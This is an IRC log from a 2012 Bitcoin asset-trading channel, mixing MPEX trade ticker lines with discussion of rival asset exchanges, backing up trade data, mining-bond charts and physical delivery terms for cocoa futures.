0.00308319 / 0.00338584 / 0.0034 (4754221 shares, 16,097.04 BTC) Dec 15 03:49:21 what did you mean you got assbot? Dec 15 03:50:01 he's on this side of the split Dec 15 03:54:43 https://bitcointalk.org/index.php?topic=130117.msg1400804#msg1400804 why cant he stop? Is he really a troll? Dec 15 03:54:58 stupid netsplit Dec 15 03:55:03 wb Dec 15 03:55:59 hey Dec 15 03:56:04 stupid nickserv Dec 15 03:56:04 another asset exchange? Dec 15 03:56:05 ugh Dec 15 03:56:15 thestringpuller: another as of when? Dec 15 03:56:34 BitFunder was in public beta testing in June Dec 15 03:57:08 sounds laaame Dec 15 03:57:12 just list on mpex Dec 15 03:57:27 list an exchange on mpex? Dec 15 03:57:33 lol Dec 15 03:58:24 yessir Dec 15 03:58:51 :P Dec 15 03:59:29 Utko, what do you own? Dec 15 04:00:12 BitFunder Dec 15 04:00:23 also, hashpower, and weexchange Dec 15 04:00:25 and hp Dec 15 04:00:43 oh, and I own some of btct.co Dec 15 04:00:46 :) Dec 15 04:00:50 er BTC-GLOBAL Dec 15 04:00:51 even Dec 15 04:01:47 hp pft, ill open an international bitcoin machines Dec 15 04:02:08 Internation house of Bitocoins? IHOB? :P Dec 15 04:02:14 ibm Dec 15 04:02:15 :p Dec 15 04:02:20 hehehe Dec 15 04:03:49 wb Dec 15 04:07:04 fringe science! Dec 15 04:07:17 you know they are working on hyperspace trvel Dec 15 04:07:48 a seller's profile on a site i'm looking at : "im the most honest person i know" Dec 15 04:07:56 LOL Dec 15 04:08:52 virgin Dec 15 04:12:02 like you mircea_popescu ? Dec 15 04:12:11 heh Dec 15 04:12:19 :) Dec 15 04:15:55 mircea_popescu: invest in fringe science Dec 15 04:16:15 fridge dood. it's called fridge Dec 15 04:16:27 lol Dec 15 04:17:01 [MPEX] [X.MGCG] 103 @ 0.12366005 = 12.737 BTC [-] Dec 15 04:17:08 special magnetic breacelets that take 5 strokes from your gold game if you believe enough, 5 btc Dec 15 04:17:14 *golf Dec 15 04:17:47 do they go on penis ? Dec 15 04:18:01 10 btc Dec 15 04:18:17 gotta believe though Dec 15 04:18:56 10 btc for 5 strokes ? wtf is this, 2009 ? Dec 15 04:19:26 results may vary Dec 15 04:21:54 [MPEX] [X.EWTI] 133 @ 0.0614575 = 8.1738 BTC [-] Dec 15 04:23:39 so how do we get pysical delivery of futures? Dec 15 04:24:36 need a clearinghouse. Dec 15 04:26:37 thestringpuller: DHL :P Dec 15 04:26:46 they are reliable, right? Dec 15 04:28:03 [MPEX] [S.MPOE] 12300 @ 0.00063014 = 7.7507 BTC [+] Dec 15 04:28:04 [MPEX] [S.MPOE] 200 @ 0.0006306 = 0.1261 BTC [+] Dec 15 04:29:50 !ticker s.dice Dec 15 04:29:52 [MPEX:S.DICE] 1day: 0.00328789 / 0.0033994 / 0.0034 (2813127 shares, 9,562.97 BTC), 30day: 0.00308319 / 0.00338584 / 0.0034 (4754221 shares, 16,097.04 BTC) Dec 15 04:31:42 holy shit Dec 15 04:32:10 somebody needs to buy my futures so I can buy S.DICE before it hits 6000000 Dec 15 04:32:22 2.5M share purchase? Dec 15 04:33:57 Which futures? Dec 15 04:34:04 [MPEX] [S.DICE] 12353 @ 0.0034 = 42.0002 BTC [+] Dec 15 04:35:06 INDQ Dec 15 04:35:18 Gold Crude and Nas100 Dec 15 04:35:38 I'm selling at current settlement value for fucks sake Dec 15 04:36:48 [MPEX] [S.MPOE] 8106 @ 0.0006306 = 5.1116 BTC [+] Dec 15 04:36:50 [MPEX] [S.MPOE] 244 @ 0.00063066 = 0.1539 BTC [+] Dec 15 04:36:54 [MPEX] [S.DICE] 2000 @ 0.0034 = 6.8 BTC [+] Dec 15 04:38:04 S.DICE is going to explode by EOM Dec 15 04:40:50 [MPEX] [S.MPOE] 5086 @ 0.00063066 = 3.2075 BTC [+] Dec 15 04:40:52 [MPEX] [S.MPOE] 10626 @ 0.00063067 = 6.7015 BTC [+] Dec 15 04:41:51 Bugpowder i waswaiting for you to go online lol Dec 15 04:42:05 !ticker s.dice Dec 15 04:42:07 [MPEX:S.DICE] 1day: 0.00328789 / 0.00339941 / 0.0034 (2827480 shares, 9,611.77 BTC), 30day: 0.00308319 / 0.00338588 / 0.0034 (4768574 shares, 16,145.84 BTC) Dec 15 04:42:18 10k traded today. Dec 15 04:43:16 lol Dec 15 04:43:29 [MPEX] [S.MPOE] 4321 @ 0.00062555 = 2.703 BTC [-] Dec 15 04:43:29 [MPEX] [S.MPOE] 6775 @ 0.00062528 = 4.2363 BTC [-] Dec 15 04:43:31 [MPEX] [S.MPOE] 15100 @ 0.00062478 = 9.4342 BTC [-] Dec 15 04:43:32 [MPEX] [S.MPOE] 26536 @ 0.00062348 = 16.5447 BTC [-] Dec 15 04:43:36 crazy day. Dec 15 04:44:19 [MPEX] [S.MPOE] 4321 @ 0.00063065 = 2.725 BTC [+] Dec 15 04:44:21 [MPEX] [S.MPOE] 8374 @ 0.00063067 = 5.2812 BTC [+] Dec 15 04:44:22 [MPEX] [S.MPOE] 6700 @ 0.00063072 = 4.2258 BTC [+] Dec 15 04:44:23 [MPEX] [S.MPOE] 2950 @ 0.0006308 = 1.8609 BTC [+] Dec 15 04:44:24 [MPEX] [S.MPOE] 1205 @ 0.00063101 = 0.7604 BTC [+] Dec 15 04:47:08 alrighty, too much excitement for one day. catch you all later! Dec 15 04:47:17 [MPEX] [S.MPOE] 4321 @ 0.00062381 = 2.6955 BTC [-] Dec 15 04:47:19 [MPEX] [S.MPOE] 14228 @ 0.00062348 = 8.8709 BTC [-] Dec 15 04:47:20 [MPEX] [S.MPOE] 22500 @ 0.00062302 = 14.018 BTC [-] Dec 15 04:47:20 [MPEX] [S.MPOE] 41025 @ 0.0006189 = 25.3904 BTC [-] Dec 15 04:47:21 [MPEX] [S.MPOE] 17194 @ 0.00060654 = 10.4288 BTC [-] Dec 15 04:47:23 [MPEX] [S.MPOE] 3718 @ 0.0006058 = 2.2524 BTC [-] Dec 15 04:47:24 [MPEX] [S.MPOE] 2439 @ 0.00060027 = 1.4641 BTC [-] Dec 15 04:47:25 [MPEX] [S.MPOE] 30000 @ 0.00060016 = 18.0048 BTC [-] Dec 15 04:47:32 heh Dec 15 04:47:40 I need MOAR S.DICE Dec 15 04:48:05 [MPEX] [S.MPOE] 300000 @ 0.0006 = 180 BTC [-] Dec 15 04:48:41 10000*.002 Dec 15 04:48:51 Hey, SatoshiDice got slightly purchased today. Dec 15 04:48:55 not a bad days profit in sales fees Dec 15 04:49:15 All the other stocks have gone up massively Dec 15 04:49:26 only S.DICE priced the IPO correctly Dec 15 04:49:31 when the top tier sells out Dec 15 04:49:35 ... Dec 15 04:49:42 Bugpowder actually... they're making 5% a month ? Dec 15 04:49:47 i fail to see how that's correctly. Dec 15 04:49:48 this month Dec 15 04:49:51 So other stocks were underpriced? Dec 15 04:50:06 let's see it for a few months in a row Dec 15 04:50:22 MPOE bot is making ~9% a month Dec 15 04:50:28 yes this month. the thing is, i think after the variousdebacles startying with pirate people were loath to dump the 100k it should have commanded. Dec 15 04:50:57 but at any rate, take the yearly ffigure : 32k, since april. Dec 15 04:51:02 yeah Dec 15 04:51:05 well Dec 15 04:51:06 10% return ? in BTC ? Dec 15 04:51:08 actually 29k Dec 15 04:51:24 some stuck payouts right now Dec 15 04:51:29 a ok Dec 15 04:51:30 but still. Dec 15 04:51:33 yeah Dec 15 04:51:45 there's never been an asset returning 10% a year IN BTC Dec 15 04:51:50 not on this massive scale anyway. Dec 15 04:52:13 I have sellers remorse on S.MPOE and S.BVPS Dec 15 04:52:15 so im definitely claiming firsts here. Dec 15 04:52:17 not happening with S.DICE Dec 15 04:52:24 Buy and hold Dec 15 04:52:28 irl people usually advise to buy and hold Dec 15 04:52:33 How much did you sell S.BVPS? Dec 15 04:52:33 in btc ? that's like ^2. or 3. Dec 15 04:52:50 Was it you who sold 100k? Dec 15 04:52:50 most at 35000 Dec 15 04:52:52 yeah Dec 15 04:52:59 Ah right. Dec 15 04:53:06 then some at 30000 Dec 15 04:53:13 when he was 3 days late on divvy Dec 15 04:54:01 [MPEX] [S.MPOE] 120000 @ 0.0006 = 72 BTC [-] Dec 15 04:54:04 Panic selling kept me solvent in the GLBSE era. Dec 15 04:54:17 lol Dec 15 04:54:19 I sent him a PM not to forget to pay dividends on the 9th and he paid out on the 9th. Dec 15 04:54:29 anyway. im off for real. don't break anything! Dec 15 04:54:34 l8r Dec 15 04:54:38 need more coins' Dec 15 04:54:39 Not sure if because I took the time to remind him or not. Dec 15 04:54:44 Later, mircea Dec 15 04:55:20 Hmm, on GLBSE, panic selling was what I was NOT doing. **** BEGIN LOGGING AT Sat Dec 15 14:16:45 2012 Dec 15 14:16:55 thestringpuller lemme know. Dec 15 14:17:13 hey pigeons, there's a half frozen hungry desperate dieing pigeon in my yard. Dec 15 14:17:18 think i should throw it some bread ? Dec 15 14:18:12 would you want bread? how about a juicy worm Dec 15 14:19:04 lol da fuck ima find worms under 2 feet of snow Dec 15 14:48:13 afaik bread is no good in winter for birds Dec 15 14:48:50 do not give them dark bread, it has too much salt and this will kill the poor bastards Dec 15 14:49:17 oat is good Dec 15 14:50:02 strange, we have pigeons too but they do not freeze even when it's -40C Dec 15 14:50:45 http://trilema.com/2012/mpex-dedicated-domains/ << Dec 15 14:50:59 your pigeons over there need winter coats :) Dec 15 14:51:05 EskimoBob i was going to ask for a few bitcoins off pigeons to pay for it. Dec 15 14:51:25 get some thread and start knitting Dec 15 14:54:01 fluffy pink thread is probably nice for southern pigeons Dec 15 14:55:08 http://img.ymlp.com/stitchandbitchlondon_cooeylion.jpg Dec 15 14:55:14 blue looks good too Dec 15 15:01:44 [MPEX] [S.MPOE] 4321 @ 0.00062839 = 2.7153 BTC [-] Dec 15 15:01:44 [MPEX] [S.MPOE] 13860 @ 0.00062805 = 8.7048 BTC [-] Dec 15 15:02:29 http://www.buywithbtc.com/this-week-mpex.html Dec 15 15:02:32 that is pretty cute. Dec 15 15:03:25 [MPEX] [S.DICE] 1900 @ 0.00338595 = 6.4333 BTC [+] Dec 15 15:03:26 [MPEX] [S.DICE] 6923 @ 0.0034 = 23.5382 BTC [+] Dec 15 15:05:01 Cant the price go super high, all the calls get exercised, then the price crash. Like in the Pirate crash month. Dec 15 15:05:26 MOAR S.DICE Dec 15 15:09:44 there's options on s.dice ? Dec 15 15:20:02 [MPEX] [S.MPOE] 3019 @ 0.00062686 = 1.8925 BTC [-] Dec 15 15:20:04 [MPEX] [S.MPOE] 7831 @ 0.00063514 = 4.9738 BTC [+] Dec 15 15:35:38 [MPEX] [S.MPOE] 4321 @ 0.00063509 = 2.7442 BTC [-] Dec 15 15:35:39 [MPEX] [S.MPOE] 12069 @ 0.00063514 = 7.6655 BTC [+] Dec 15 15:35:40 [MPEX] [S.MPOE] 14400 @ 0.00063522 = 9.1472 BTC [+] Dec 15 15:35:41 [MPEX] [S.MPOE] 5737 @ 0.00063547 = 3.6457 BTC [+] Dec 15 15:35:42 [MPEX] [S.MPOE] 4651 @ 0.00063608 = 2.9584 BTC [+] Dec 15 15:57:29 [MPEX] [S.MPOE] 13357 @ 0.00063539 = 8.4869 BTC [-] Dec 15 15:59:11 [MPEX] [S.MPOE] 11349 @ 0.00063608 = 7.2189 BTC [+] Dec 15 15:59:12 [MPEX] [S.MPOE] 951 @ 0.00063787 = 0.6066 BTC [+] Dec 15 16:07:02 [MPEX] [S.DICE] 2000 @ 0.0033353 = 6.6706 BTC [-] Dec 15 16:07:03 [MPEX] [S.DICE] 1700 @ 0.0033341 = 5.668 BTC [-] Dec 15 16:20:59 [MPEX] [O.BTCUSD.C130T] 800 @ 0.16532973 = 132.2638 BTC [-] Dec 15 16:21:17 [MPEX] [O.BTCUSD.C120T] 900 @ 0.21548437 = 193.9359 BTC [-] Dec 15 16:24:14 [MPEX] [S.MPOE] 19306 @ 0.00063539 = 12.2668 BTC [-] Dec 15 16:35:23 [MPEX] [S.MPOE] 6911 @ 0.00063787 = 4.4083 BTC [+] Dec 15 16:35:25 [MPEX] [S.MPOE] 3439 @ 0.00063789 = 2.1937 BTC [+] Dec 15 16:57:37 [MPEX] [S.MPOE] 4321 @ 0.00063551 = 2.746 BTC [-] Dec 15 16:57:39 [MPEX] [S.MPOE] 20387 @ 0.00063539 = 12.9537 BTC [-] Dec 15 16:57:39 [MPEX] [S.MPOE] 1181 @ 0.00063096 = 0.7452 BTC [-] Dec 15 17:04:22 [MPEX] [S.MPOE] 4321 @ 0.00063115 = 2.7272 BTC [+] Dec 15 17:04:23 [MPEX] [S.MPOE] 7579 @ 0.00063096 = 4.782 BTC [-] Dec 15 17:10:03 [MPEX] [S.MPOE] 12694 @ 0.00063096 = 8.0094 BTC [-] Dec 15 17:14:59 can you guys add https://www.litecoinglobal.com/ and https://btct.co/ and https://bitfunder.com/ to assbots feed list? Dec 15 17:15:08 yesplease Dec 15 17:15:20 Im tired of seeing the mpoe and dice exchange. Dec 15 17:17:25 they know where to find me, bug them. Dec 15 17:17:53 kakobrekla: DOOO EEEET Dec 15 17:18:03 barking at the wrong tree Diablo-D3 Dec 15 17:18:24 dude, I bark at all trees concurrently Dec 15 17:18:33 :) Dec 15 17:18:56 lol Dec 15 17:19:15 iirc burnside was saying he'll get the twitter feed. Dec 15 17:19:21 ukto too Dec 15 17:19:29 fuck twitter feeds Dec 15 17:19:32 pigeons: send me your username at litecoinglobal and I can do the transfer Dec 15 17:19:36 twitter is not a generic messaging protocol Dec 15 17:19:46 just use fucking telnet Dec 15 17:19:55 twitter is for birds Dec 15 17:20:08 angry ones? Dec 15 17:20:10 hey EskimoBob Dec 15 17:20:21 Ukto: Hi Dec 15 17:20:28 good luck with the sales! :) Dec 15 17:20:40 hope you guys get the equipment you need Dec 15 17:20:47 think it should work out Dec 15 17:20:51 I* Dec 15 17:21:06 I need that :) Sorry, for not going with your exchange. BTW; we can do a PT, if you like that idea Dec 15 17:21:20 dont be sorry Dec 15 17:21:23 it really isnt a competition Dec 15 17:21:29 and you are more than welcome to Dec 15 17:21:36 yeah, I think we need more than one exchange Dec 15 17:21:36 Ukto: if we get this rolling, it will be awesome. There is no more "if" there is "when" Dec 15 17:21:57 As I was talking to deadterra bout his s.dice PT Dec 15 17:22:12 we both agreed that we should have at least 4~5 exchanges Dec 15 17:22:20 for when the next topples Dec 15 17:22:30 NOOOOOO! Dec 15 17:22:31 and exchanges should work together Dec 15 17:22:38 so issuers can be on all of them Dec 15 17:22:40 like a P2P Dec 15 17:22:51 p2p has its fault Dec 15 17:22:52 gone form one, shows up on next one Dec 15 17:23:02 "like a P2p" Dec 15 17:23:03 i kinda want to use a version it as a backend for my system Dec 15 17:23:07 yeah Dec 15 17:23:15 I am setting up my api Dec 15 17:23:29 where terra can easily and automatically transfer share for users between exchanges Dec 15 17:23:35 well Dec 15 17:23:41 exchanges need to afree on data exchange protocol and become each others backup Dec 15 17:23:43 at least in / out of bf Dec 15 17:23:49 agree* Dec 15 17:24:22 if the other exchanges go down, he can go by the last list he had.. which might be outdated somewhat Dec 15 17:24:25 trust issues? encryp the data Dec 15 17:24:29 same thing for BF Dec 15 17:24:37 except that someone else might have a newer version Dec 15 17:24:41 since its all public Dec 15 17:25:03 was debating doing a signed version of the asset list Dec 15 17:25:05 pushing trades to other exchanges can't be that hard or a resource hog Dec 15 17:25:16 its not a resource issue Dec 15 17:25:20 its a responsibility issue Dec 15 17:25:25 who is responsible Dec 15 17:25:31 nefario Dec 15 17:25:33 lol Dec 15 17:25:36 the excahnges dont want to be responsible for shares between the exchanges Dec 15 17:25:37 LOL Dec 15 17:25:44 so that puts all the work onto the issuer Dec 15 17:26:10 kinda like how carnth did his gold deal Dec 15 17:26:15 between ltc-globla and btct Dec 15 17:26:19 mircea_popescu twitter is going out Dec 15 17:26:22 he lets ppl move teh stuff between em Dec 15 17:26:26 lets say we have 4 exchanges and they keep eachothers trade history and balances updates (encrypted) for each other Dec 15 17:26:39 a, right. Dec 15 17:26:42 if one drops down, anyone can pick up and relist Dec 15 17:26:52 mircea_popescu: yeah, i already spent the time to make twitter feed, even same format as glbse to make it weasy for kakobrekla, now he wont use it cause twatter will eventaulyl disco it Dec 15 17:27:13 EskimoBob: as long as you have up to the second latest copy of the data Dec 15 17:27:20 oops. Dec 15 17:27:28 so its meh Dec 15 17:27:36 re: mirc Dec 15 17:27:44 crypto isnt doing any of it to my knowledge.. listing data Dec 15 17:27:49 privately to issuers or public Dec 15 17:27:51 yes, but we are not talikng about 1000 trades a second here Dec 15 17:27:51 accually it was mps idea to phase twitter out Dec 15 17:27:58 btct sends the issuer a list every X hours Dec 15 17:28:05 forget twitter, Dec 15 17:28:30 bitfunders list is live Dec 15 17:28:37 its eating trades even when you appy the microtime patch Dec 15 17:28:37 so as long as someone has a copy its within some reason Dec 15 17:28:41 ok, lets upgrade this backup idea Dec 15 17:28:45 apply Dec 15 17:28:56 i want to post trade data Dec 15 17:28:59 like the twatter deal Dec 15 17:29:01 with signed msgs Dec 15 17:29:15 so if somoene has a holdings from 10 min prior to a shutdown or some shit Dec 15 17:29:18 the can say look Dec 15 17:29:20 that was my trade Dec 15 17:29:28 its signed and proven Dec 15 17:29:33 i SHOULD have X shares Dec 15 17:30:04 you send out balances and trade data Dec 15 17:30:10 now, if you add Dec 15 17:30:14 thats alot of data heh Dec 15 17:30:15 to post Dec 15 17:30:18 every trade Dec 15 17:30:26 something to trade data (a key) Dec 15 17:30:33 the problem is you woudl have to show trade data between public addresses Dec 15 17:30:35 and now your exchange gets blown up Dec 15 17:30:36 then ppl can see trading history of users Dec 15 17:30:40 tha gets to be less anon Dec 15 17:30:51 the trades can me restored to the latest ping from your exchange Dec 15 17:31:10 wihle that is true Dec 15 17:31:11 messages can or actually have to be encrypted Dec 15 17:31:25 doesnt help the public Dec 15 17:31:30 if the priv key has been taken hostage Dec 15 17:31:31 :P Dec 15 17:31:41 every backup exchange has the key Dec 15 17:31:55 and account holders Dec 15 17:32:06 so you can see your own trades and prove those are yours Dec 15 17:32:41 yeah Dec 15 17:32:43 theres a bit to consider. Dec 15 17:32:48 Right now Dec 15 17:32:55 in any event more use of pgp can not hurt the new exchanges. Dec 15 17:32:57 I want to finish the core functionality extensions Dec 15 17:33:04 mircea_popescu: agreed Dec 15 17:33:20 this is just a rough idea. You guys are smart enough and can make it into something that works Dec 15 17:33:22 it's one point that's been gained through experience so far, gpg is good. Dec 15 17:33:34 I just updated the trading graph to have the volume panel. Dec 15 17:33:44 gonna add the depth chart a bit later today/tonight Dec 15 17:35:11 still debating if I will bother with candle/ohlc.. since the open/close would be midnight.. it would just be showing day to day high/low and midnight price... Dec 15 17:35:50 althgouh I will be enabling trend line drawing :P Dec 15 17:36:04 so ppl can draw a lot of lines aiming downwards over timer Dec 15 17:36:06 for most assets :P Dec 15 17:36:33 at least the mining ones Dec 15 17:38:59 [MPEX] [S.MPOE] 3200 @ 0.0006273 = 2.0074 BTC [-] Dec 15 17:41:57 [MPEX] [O.BTCUSD.P150T] 120 @ 0.1534485 = 18.4138 BTC [-] Dec 15 17:43:59 [MPEX] [S.MPOE] 7800 @ 0.000625 = 4.875 BTC [-] Dec 15 17:46:31 Ukto: add the price:return line. This will look soothingly straight, when price falls, and divs fall Dec 15 17:47:33 return? talking about the graph? Dec 15 17:52:29 yeah Dec 15 17:52:57 return - Mh/s Dec 15 17:53:54 http://www.zerohedge.com/news/2012-12-11/guest-post-five-minute-example-hft-shenanigans Dec 15 17:53:57 this is quite the read. Dec 15 17:57:06 mircea_popescu: and this is why all the fkn trading bots are no good Dec 15 17:57:27 actually, this is why mpex doesn't allow instacancellation of orders :) Dec 15 17:57:28 EskimoBob: wow, I feel completely lost as to what you are talking about now. :P Dec 15 17:57:36 stock graphs.. Mh/s ? Dec 15 17:58:02 you misunderstood me Ukto Dec 15 17:58:34 I think so too :P Dec 15 17:58:42 you see, miningbonds (the perpetual ones) usually lose value over time and so do the returns they pay Dec 15 17:59:01 I still call them "turds" Dec 15 17:59:45 mining contract charts will look ugly and depressing over time if diff keeps crawling up the hill Dec 15 18:00:27 so, if you add a line for contact price ratio to what Mh/s produced, you probably get a nice flat line Dec 15 18:00:53 delete that "ratio" Dec 15 18:01:14 actually Dec 15 18:01:41 [MPEX] [S.MPOE] 4506 @ 0.0006273 = 2.8266 BTC [+] Dec 15 18:01:43 [MPEX] [S.MPOE] 7944 @ 0.00062845 = 4.9924 BTC [+] Dec 15 18:02:28 adding a line for what "Mh/s" produces at any point in time, is not that bad. You get that from difficulty Dec 15 18:03:16 and this is actually "predicting" the mining contract share price Dec 15 18:05:20 when you say adding a line, a graph ? Dec 15 18:09:40 yes Dec 15 18:10:11 for mining contracts, that pay N Mh/s as div Dec 15 18:10:47 woudl require a few more fields Dec 15 18:10:50 not all pay 100% pps Dec 15 18:11:04 i would then have to connect to a bitcoind or json from somewhere to get diff Dec 15 18:11:12 for each timeperiod Dec 15 18:11:16 not that it isnt doable Dec 15 18:11:27 just a bit of work to put it all together Dec 15 18:11:28 http://trilema.com/2012/mpex-and-the-hft-problem/ :D Dec 15 18:11:34 diff changes are not that frequent Dec 15 18:11:43 mircea_popescu: you sure do have a lot of time on your hands :P Dec 15 18:11:54 haha why you say ? Dec 15 18:12:06 EskimoBob: but when the graph is generated, live, it has to do a diff lookup for each payouts date/time Dec 15 18:12:21 all the blogs hehe Dec 15 18:12:30 cache it Ukto, it never changes Dec 15 18:12:46 lol Dec 15 18:13:00 the graph will every time you add to it :P Dec 15 18:15:07 yes, but your diff history...actually the result from the calculation of what 1 Mh/s can produce is cashed and can be used for every miningbond Dec 15 18:15:17 if it's a 5Mh/s, x5 Dec 15 18:15:36 if it's a 1000 Mh/s then x 1000 and so on Dec 15 18:16:02 compared to trade data, this is like nothing Dec 15 18:18:18 as I said, its easily doable in a multitude of ways, I just want to think through the best way to do it. right now, I am still trying to focus on the core systems Dec 15 18:18:35 while playing with the graphs, I am working on the api system, and comprehensive documention for it Dec 15 18:19:49 sure, this is just "bells an whistles" Dec 15 18:19:55 yeah :) Dec 15 18:19:58 I liek the idea Dec 15 18:20:09 I stuck it in my list already. :) Dec 15 18:20:42 let me dig around in old GLBSE thread. I had many ideas over there. :) Dec 15 18:21:48 sure :) Dec 15 18:22:02 en facte, one thing on my list Dec 15 18:22:05 is discussion boards Dec 15 18:22:12 a set of sub boards per asset Dec 15 18:22:16 as well as some for the site itself Dec 15 18:29:46 [MPEX] [S.MPOE] 21201 @ 0.000625 = 13.2506 BTC [-] Dec 15 18:29:55 Ukto: here is one that just popped to my head - large block trades that can be executed outside/inside best bid/ask Dec 15 18:30:06 dark orders? Dec 15 18:30:22 nothing "dark" about them :) Dec 15 18:30:45 well.. if they are not dark, then bots will change the price :P Dec 15 18:30:46 just less panic and hysteria Dec 15 18:31:09 large block trades that can be executed ___outside/inside___ best bid/ask Dec 15 18:31:27 never really listed in order book but show up in trades Dec 15 18:31:42 hmm Dec 15 18:31:58 so how would it work. you pull up the asset page, see the order book and the best bid/ask Dec 15 18:32:07 want to do.. 1,000 shares Dec 15 18:32:14 and the best ask is say 1btc Dec 15 18:32:16 to make this easy Dec 15 18:32:21 what happens next. :) Dec 15 18:32:43 Lets say good people at EMIF.LTC-TRADING or LITECOINRS-PT come to me an say - lets do 20K shares trade at price X Dec 15 18:33:19 Ukto: large blocks are off the orderbook usually and agreed on the side Dec 15 18:34:04 so it would be a "direct trade" Dec 15 18:34:05 :P Dec 15 18:34:24 not neccesarily in large blocks Dec 15 18:34:25 yes and now... depends what you mean by that Dec 15 18:34:30 no Dec 15 18:34:42 you need to set min limit for those. Dec 15 18:34:49 I am already planning to be able to send X shares to Y person for Z price Dec 15 18:34:59 lets say 100 BTC or something Dec 15 18:35:31 sure, you can use that Dec 15 18:35:37 with my direct trades, it would be doable at any amount, it just wont show on teh trade history Dec 15 18:36:23 showing it on trade history would leave a giant opening for abuse Dec 15 18:37:07 like to forcefully raise or lower the traded price i think Dec 15 18:38:07 i am kind of confused by ltc-global's "internal asset transfer" Dec 15 18:38:13 it has a value/share field Dec 15 18:38:27 not sure if you can trade for a price directly.. Dec 15 18:38:29 or what that fields for Dec 15 18:46:42 meh I feel like shit today Dec 15 18:48:25 mircea_popescu: what happend to mpex.us? Dec 15 18:48:48 mm Dec 15 18:48:55 did the dns get frazzled ? Dec 15 18:49:58 FabianB it was unrouted. fixed. Dec 15 18:50:27 (may take a little to propagate) Dec 15 18:50:54 [MPEX] [S.MPOE] 7400 @ 0.000625 = 4.625 BTC [-] Dec 15 18:51:20 otherwise see http://trilema.com/2012/mpex-dedicated-domains/ Dec 15 19:07:32 mircea_popescu: yup, works again :) Dec 15 19:08:02 ty for pointing out :) Dec 15 19:08:09 [MPEX] [S.MPOE] 5456 @ 0.00062845 = 3.4288 BTC [+] Dec 15 19:08:10 [MPEX] [S.MPOE] 6292 @ 0.00063176 = 3.975 BTC [+] Dec 15 19:08:12 [MPEX] [S.MPOE] 1952 @ 0.00063789 = 1.2452 BTC [+] Dec 15 19:08:23 mircea_popescu: i know, was reading backlog, noticed that post and was wondering if .us still redirects or points to mpex directly like the other domains Dec 15 19:08:35 so i tried and noticed it not working Dec 15 19:08:39 np Dec 15 19:16:40 [MPEX] [S.MPOE] 4321 @ 0.00063788 = 2.7563 BTC [-] Dec 15 19:16:42 [MPEX] [S.MPOE] 29 @ 0.00063789 = 0.0185 BTC [+] Dec 15 19:22:50 [MPEX] [S.MPOE] 2369 @ 0.00062506 = 1.4808 BTC [-] Dec 15 19:26:43 mircea_popescu: did you get my message Dec 15 19:27:31 you dont hear about school shootings in israel.. just saying... http://i.imgur.com/Ts1So.jpg Dec 15 19:27:32 :P Dec 15 19:30:03 [MPEX] [S.MPOE] 1952 @ 0.00062506 = 1.2201 BTC [-] Dec 15 19:30:05 [MPEX] [S.MPOE] 29198 @ 0.000625 = 18.2488 BTC [-] Dec 15 19:32:02 mpex! Dec 15 19:32:30 ;;seen smicklea Dec 15 19:32:31 I have not seen smicklea. Dec 15 19:32:33 ;;seen smicklea Dec 15 19:32:33 I have not seen smicklea. Dec 15 19:32:36 ;;seen smickles Dec 15 19:32:37 smickles was last seen in #bitcoin-assets 12 hours, 2 minutes, and 54 seconds ago: I consider myself amature, but i've been told what I have done is impressive by amatures Dec 15 19:34:22 thestringpuller yea, lemme hear. Dec 15 19:35:29 wait. smickles considers himself a mature ?! as in, old pornstar ?! Dec 15 19:36:57 what if the personor entity acting as the clearing house had, access to the physical asset via normal channels, fiat on hand to pay for said asset, and btc's on hand. in theory couldn't he sign a pgp contract granting ownership to future holders upon settlement? Dec 15 19:37:14 absolutely. Dec 15 19:37:25 that's exactly how this works. Dec 15 19:38:39 so like mbor (i forget initial for bonds) you could have multiple clearing house entities to deliver physical assets traded on mpex Dec 15 19:39:23 as you have mutiple bond holders who help settle optiond Dec 15 19:39:25 mpbor. and yes. Dec 15 19:39:30 options* Dec 15 19:39:46 so are you in talks to get said clearing houses set up? Dec 15 19:40:32 not really. Dec 15 19:40:58 most people who'd be competent enough to do it either don't want it because it'd likely be low volume to start or legal concerns Dec 15 19:41:21 i would do it with cocoa Dec 15 19:42:13 youd likely need one house per commodity Dec 15 19:42:38 but do you have a cocoa warehouse ?! Dec 15 19:43:14 im good friends with a cocoa distributor and I own a warehouse so its possible Dec 15 19:43:42 this'd be wonderful. Dec 15 19:43:50 however i wouldnt want to have a paper trail between fiat and btc in the us after the glbse fiasco Dec 15 19:43:55 where ? Dec 15 19:46:51 [MPEX] [S.MPOE] 14400 @ 0.000625 = 9 BTC [-] Dec 15 19:46:56 ;;later tell bugpowder there's an important point to consider in the discussion of X.IDIFF margins as the quarters roll by which we skipped over last time. Dec 15 19:46:56 The operation succeeded. Dec 15 19:47:25 now that i think of it, it wouldn't really matter. if the cocoa comes staright from the distributor, then there is no reason to use am exchange except for pricing Dec 15 19:47:49 ;;later tell bugpowder if you deposit 2.3btc today for the SEP and then as MAR rolls by the diff actually went way up like 9x, the new collateral is just 3x, but 3x the NEW price, which is 9x. Dec 15 19:47:49 The operation succeeded. Dec 15 19:47:56 ;;later tell bugpowder so it washes out. Dec 15 19:47:57 The operation succeeded. Dec 15 19:48:16 thestringpuller well, where'd it be distributed ? Dec 15 19:49:41 the us, but delivery to end user could originate from anywhere Dec 15 19:49:58 no, what i mean is. suppose X has 500 contracts to take delivery on Dec 15 19:50:06 where does he pick up his cocoa ? Dec 15 19:50:29 he gives an address and it shows up at his door Dec 15 19:50:59 or he is selling it to the coffee shop and he gives that address Dec 15 19:51:03 what, CIF any destination ?! Dec 15 19:51:53 or more like DAT ? you don't clear customs/taxes do you Dec 15 19:52:06 what are we doing now? Dec 15 19:52:41 mircea_popescu: one moment i am on a phone lemme change olatforms Dec 15 19:52:44 brb Dec 15 19:52:45 no rush. Dec 15 19:55:57 mmm... no idea. Trading cocoa beans? Dec 15 19:57:01 im not even sure, he might have meant processed Dec 15 19:58:24 I was typing from a phone, now I'm tethered in. Dec 15 19:59:13 so. your delivery model is something like what exactly ? CIF ? DAT ? DAP (FIS) ? Dec 15 20:01:04 DAT would be directly from distributor to clinet correcnt? Dec 15 20:01:06 corret* Dec 15 20:01:16 ugh my typing is awful today Dec 15 20:01:24 dat is delivered to terminal Dec 15 20:01:31 "Seller pays for carriage to the terminal, except for costs related to import clearance, and assumes all risks up to the point that the goods are unloaded at the terminal." Dec 15 20:02:01 FIS is the ancient "free in store", buyer pays custom duty if any. Dec 15 20:02:20 CIF is more comprehensive Dec 15 20:02:50 CIF is Cost, Insurance and Freight to named port. Dec 15 20:03:00 yes so it's on the seller Dec 15 20:03:03 as well Dec 15 20:03:07 yes. Dec 15 20:03:24 but incidentally, what exact cocoa is this ? bean ? processed ? powder ? what 